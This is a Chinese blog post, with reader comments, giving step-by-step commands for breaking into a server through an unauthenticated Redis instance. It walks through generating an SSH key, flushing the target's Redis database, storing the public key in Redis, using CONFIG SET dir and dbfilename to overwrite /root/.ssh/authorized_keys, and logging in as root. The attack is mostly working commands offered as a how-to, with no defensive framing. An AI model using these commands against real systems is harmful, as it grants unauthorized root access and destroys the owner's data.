通过redis入侵服务器的步骤
通过redis入侵服务器的步骤
独钓渔 发表于2年前
通过redis入侵服务器的步骤
  • 发表于 2年前
  • 阅读 2432
  • 收藏 28
  • 点赞 1
  • 评论 5

腾讯云 学生专属云服务套餐 10元起购>>>   

摘要: 通过redis入侵服务器的步骤

通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。

一,生成本地ssh公钥

ssh-keygen

 

二,先连接redis看看

telnet 192.168.15.10 6379
redis-cli -h 192.168.15.10

 

 

三, 清一下redis数据库

redis-cli -h 192.168.15.10 flushall

 

 

四, 向redis写自己的公钥

cat key.txt |redis-cli -h 192.168.15.10 -x set redis

 

 

五, 利用redis写入到文件中

#连接redis
#redis-cli -h 192.168.15.10
#查看keys
192.168.15.10>keys *
#写入配置库的路径及存放位置
192.168.15.10>CONFIG SET dir /root/.ssh/
#写入配置库名称及存放的名字
192.168.15.10>CONFIG SET dbfilename "authorized_keys"
#写入
192.168.15.10>save
#退出
192.168.15.10>exit

 

 

六, 远程连接

ssh root@192.168.15.10

 

 

注意,这个是使用的默认的。也就是说别人是用的root来启动的redis 并且没有更改sshd配置文件的位置,以及redis可以默认的可以随意访问性的。当然有许多可以猜。

这个是最近redis爆出来的。

 

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

 

共有 人打赏支持
粉丝 43
博文 349
码字总数 127147
评论 (5)
金拱门
mark一下。这个洞好玩79
likebeta
redis保存的文件是自定义的格式, 应该是不行的吧
独钓渔

引用来自“likebeta”的评论

redis保存的文件是自定义的格式, 应该是不行的吧

可以的,请测试
likebeta

引用来自“独钓渔”的评论

引用来自“likebeta”的评论

redis保存的文件是自定义的格式, 应该是不行的吧

可以的,请测试
我试了, authorized_keys中保存的不只是ssh-key, 登陆不了
独钓渔

引用来自“独钓渔”的评论

引用来自“likebeta”的评论

redis保存的文件是自定义的格式, 应该是不行的吧

可以的,请测试

引用来自“likebeta”的评论

我试了, authorized_keys中保存的不只是ssh-key, 登陆不了
我试了,确实可以。 你要把自己的公钥写到key值上去。
×
独钓渔
如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!
* 金额(元)
¥1 ¥5 ¥10 ¥20 其他金额
打赏人
留言
* 支付类型
微信扫码支付
打赏金额:
已支付成功
打赏金额: